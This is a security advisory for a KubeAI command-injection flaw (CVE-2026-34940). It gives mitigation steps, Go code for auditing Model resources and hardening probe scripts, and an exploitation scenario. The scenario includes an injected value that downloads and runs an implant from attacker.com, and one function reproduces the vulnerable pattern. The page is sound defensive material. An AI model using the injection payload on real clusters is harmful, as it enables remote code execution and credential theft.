CVE-2026-34940: KubeAI: RCE via shell injection in Ollama startup probe

HIGH CISA: ATTEND
Published April 6, 2026
CISO Take

KubeAI's ollamaStartupProbeScript() function constructs bash commands using unsanitized model URL parameters (ref, modelParam), enabling OS command injection (CWE-78) that Kubernetes executes as a startup probe inside model server pods. Any principal with RBAC permissions to create or modify Model custom resources can run arbitrary commands in your LLM inference pods — potentially exposing model weights, API credentials, and internal cluster network access. While no public exploit exists and CISA KEV status is negative, this is a straightforward OS command injection requiring minimal skill once cluster-level access to Model CRDs is obtained. Upgrade to KubeAI 0.23.2 immediately; as interim mitigation, tightly restrict RBAC for the Model custom resource (create/update/patch verbs) to trusted operators only.

Sources: NVD, GitHub Advisory, ATLAS

What is the risk?

Effective risk is HIGH despite the absent CVSS score. CWE-78 OS command injection executed via bash -c inside Kubernetes pods is inherently critical when reachable. The attack surface is gated behind Kubernetes RBAC for Model custom resources, which reduces external exposure but not the insider or post-compromise threat actor risk. In multi-tenant clusters, with over-permissive CI/CD service accounts, or in environments where users can submit model definitions, this becomes trivially exploitable. RCE inside model serving pods directly threatens the confidentiality of LLM inference infrastructure. Any automated pipeline that turns external model URLs into Model CRDs dramatically expands the blast radius.

Severity & Risk

CVSS 3.1: 8.8 / 10
EPSS: 0.0% chance of exploitation in 30 days (higher than 4% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Moderate
Exploitation Confidence: medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface (CVSS 3.1 base metrics)

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

What should I do?

5 steps

1. PATCH
   Upgrade KubeAI to 0.23.2 — the fix sanitizes model URL components before shell command construction.

2. RBAC AUDIT
   Restrict Kubernetes RBAC on Model custom resources immediately — deny create/update/patch to all principals except trusted operators. Run: kubectl get rolebindings,clusterrolebindings -A -o json | grep -i model to surface over-permissive bindings.

3. REVIEW
   Audit existing Model CRDs for suspicious injected values in ref/modelParam fields: kubectl get models -A -o yaml | grep -E '(ref|modelParam)' and inspect for shell metacharacters (;, |, $, backticks).

4. DETECT
   Monitor model server pods for unexpected child processes spawned from startup probes using Falco or similar runtime security tools.

5. HARDEN
   Apply Pod Security Standards (restricted profile) and NetworkPolicies to model serving namespaces to limit blast radius if exploitation occurs.
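The REVIEW step above greps raw YAML, which misses percent-encoded metacharacters and gives no structured output. The following Go program is an added example, not KubeAI's code, that does the same audit over the JSON form of `kubectl get models -A -o json`. It assumes the model location lives at `spec.url` in each Model resource (the advisory names the derived `ref` and `modelParam` values but not the spec field they come from, so the whole URL is scanned); the Model list embedded in the program is constructed sample data, not real cluster output.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/url"
	"strings"
)

// sampleModels is a constructed stand-in for `kubectl get models -A -o json`.
// Only the fields this audit reads are included. The third item hides a
// metacharacter behind percent encoding.
const sampleModels = `{"items":[
  {"metadata":{"name":"llama3-8b","namespace":"inference"},"spec":{"engine":"OLlama","url":"ollama://llama3:8b"}},
  {"metadata":{"name":"tainted","namespace":"inference"},"spec":{"engine":"OLlama","url":"ollama://llama3; echo injected"}},
  {"metadata":{"name":"encoded","namespace":"ci"},"spec":{"engine":"OLlama","url":"ollama://llama3%3Becho%20x"}},
  {"metadata":{"name":"gemma","namespace":"ci"},"spec":{"engine":"OLlama","url":"ollama://gemma2:2b"}}
]}`

// shellMeta lists characters that mean something to `bash -c` and have no
// place in a model URL. The advisory's list (; | $ backtick) is extended with
// the remaining operators, quoting characters and whitespace.
const shellMeta = ";|&$()<>`\\\"'\n\t "

// Finding records one Model whose URL looks tampered with.
type Finding struct {
	Namespace string
	Name      string
	Field     string
	Value     string
}

// modelList mirrors just the part of the Model resource this audit needs
// (spec.url is an assumption about the KubeAI Model spec).
type modelList struct {
	Items []struct {
		Metadata struct {
			Name      string `json:"name"`
			Namespace string `json:"namespace"`
		} `json:"metadata"`
		Spec struct {
			Engine string `json:"engine"`
			URL    string `json:"url"`
		} `json:"spec"`
	} `json:"items"`
}

// HasShellMetachars reports whether s, either as written or after one round
// of percent decoding, contains a character from shellMeta.
func HasShellMetachars(s string) bool {
	if strings.ContainsAny(s, shellMeta) {
		return true
	}
	// "%3B" is harmless in a URL but becomes ";" if any layer decodes it
	// before the command string is built, so check the decoded form too.
	if decoded, err := url.PathUnescape(s); err == nil && decoded != s {
		return strings.ContainsAny(decoded, shellMeta)
	}
	return false
}

// AuditModels parses a Model list and returns one Finding per suspicious URL,
// regardless of engine, in list order.
func AuditModels(raw []byte) ([]Finding, error) {
	var list modelList
	if err := json.Unmarshal(raw, &list); err != nil {
		return nil, fmt.Errorf("parsing model list: %w", err)
	}
	var findings []Finding
	for _, m := range list.Items {
		if HasShellMetachars(m.Spec.URL) {
			findings = append(findings, Finding{
				Namespace: m.Metadata.Namespace,
				Name:      m.Metadata.Name,
				Field:     "spec.url",
				Value:     m.Spec.URL,
			})
		}
	}
	return findings, nil
}

func main() {
	findings, err := AuditModels([]byte(sampleModels))
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	for _, f := range findings {
		fmt.Printf("SUSPICIOUS %s/%s %s=%q\n", f.Namespace, f.Name, f.Field, f.Value)
	}
	fmt.Printf("%d suspicious Model resource(s)\n", len(findings))
}
```

To run it against a live cluster, replace the embedded constant with the bytes of `kubectl get models -A -o json`. A hit on a Model that nobody remembers creating is a strong signal to check the audit log for who last patched it.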

CISA SSVC Assessment

Decision: Attend
Exploitation: poc
Automatable: No
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Article 9 - Risk management system
ISO 42001: A.9.1 - Security of AI systems
NIST AI RMF: MANAGE 2.2 - Risks associated with AI system components
OWASP LLM Top 10: LLM06:2025 - Excessive Agency

Frequently Asked Questions

Is CVE-2026-34940 actively exploited?

No confirmed active exploitation of CVE-2026-34940 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-34940?

This vulnerability affects the following AI/ML architecture patterns: model serving, Kubernetes-based AI deployments, LLM inference infrastructure, MLOps pipelines.

What is the CVSS score for CVE-2026-34940?

CVE-2026-34940 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.02%.

Technical Details

NVD Description

KubeAI is an AI inference operator for Kubernetes. Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods. This vulnerability is fixed in 0.23.2.

Exploitation Scenario

An attacker holding Kubernetes credentials that allow Model CRD updates — obtained via a compromised CI/CD service account, misconfigured RBAC, or insider access — crafts a Model resource with a malicious modelParam field such as 'llama3; curl http://attacker.com/implant.sh | bash; echo '. When KubeAI's controller processes this resource, ollamaStartupProbeScript() interpolates the unsanitized value into a bash -c command that Kubernetes executes as the pod startup probe. The injected commands run inside the model server container with the pod's service account privileges, enabling the attacker to exfiltrate Hugging Face tokens, cloud provider credentials, or model artifacts, pivot to other cluster services via the internal network, or establish persistence inside the inference infrastructure for long-term access.
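The two passages above describe the flaw as a fmt.Sprintf into a `bash -c` string. The Go program below is an added example, not KubeAI's code or its actual fix: it places the unsafe construction beside two defences a controller author would apply, an allowlist on the model ref and an argv-form probe so no shell parses the value, with single-quote escaping as a fallback for the case where a shell cannot be avoided. The probe body (`ollama show <ref>`) and the ref grammar in `refPattern` are assumptions made for the example; the injected string used in `main` is a harmless constructed sample.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// vulnerableProbeScript reproduces the shape of the flaw: the model ref is
// dropped straight into a string that will later run under `bash -c`.
// Illustrative pattern only; the probe body is a placeholder.
func vulnerableProbeScript(ref string) string {
	return fmt.Sprintf("ollama show %s > /dev/null", ref)
}

// refPattern is an assumed grammar for Ollama-style refs such as "llama3:8b"
// or "library/llama3:latest": a name of alphanumerics, dots, slashes and
// dashes with an optional ":tag". Everything else, including every shell
// metacharacter and whitespace, is rejected.
var refPattern = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._/-]*(:[A-Za-z0-9._-]+)?$`)

// ErrUnsafeRef is returned for any ref outside the allowlist.
var ErrUnsafeRef = errors.New("model ref contains characters outside the allowlist")

// ValidateRef accepts a ref only if it matches refPattern exactly.
func ValidateRef(ref string) error {
	if !refPattern.MatchString(ref) {
		return fmt.Errorf("%w: %q", ErrUnsafeRef, ref)
	}
	return nil
}

// SafeProbeCommand returns the probe as an argv slice, the form a Kubernetes
// ExecAction takes, so the ref is passed to the binary without any shell
// parsing it.
func SafeProbeCommand(ref string) ([]string, error) {
	if err := ValidateRef(ref); err != nil {
		return nil, err
	}
	return []string{"ollama", "show", ref}, nil
}

// shellQuote is the defence-in-depth fallback for when a shell really is
// needed: wrap the value in single quotes and turn every embedded single
// quote into '\'' so nothing inside is interpreted.
func shellQuote(s string) string {
	return "'" + strings.ReplaceAll(s, "'", `'\''`) + "'"
}

// SafeProbeScript builds a bash -c string with both defences applied.
func SafeProbeScript(ref string) (string, error) {
	if err := ValidateRef(ref); err != nil {
		return "", err
	}
	return fmt.Sprintf("ollama show %s > /dev/null", shellQuote(ref)), nil
}

func main() {
	// Constructed inputs: one legitimate ref, one carrying an injected command.
	for _, ref := range []string{"llama3:8b", "llama3; echo injected"} {
		fmt.Printf("vulnerable: %s\n", vulnerableProbeScript(ref))
		argv, err := SafeProbeCommand(ref)
		if err != nil {
			fmt.Printf("hardened:   rejected (%v)\n", err)
			continue
		}
		fmt.Printf("hardened:   argv=%q\n", argv)
	}
}
```

The allowlist is the real control: it fails closed on anything the grammar does not recognise, while quoting alone only protects the one shell that reads the string. Using argv form for the probe removes the shell from the path entirely, which is why the hardened builder returns a slice rather than a string.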

Weaknesses (CWE)

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

Published: April 6, 2026
Last Modified: April 15, 2026
First Seen: April 6, 2026
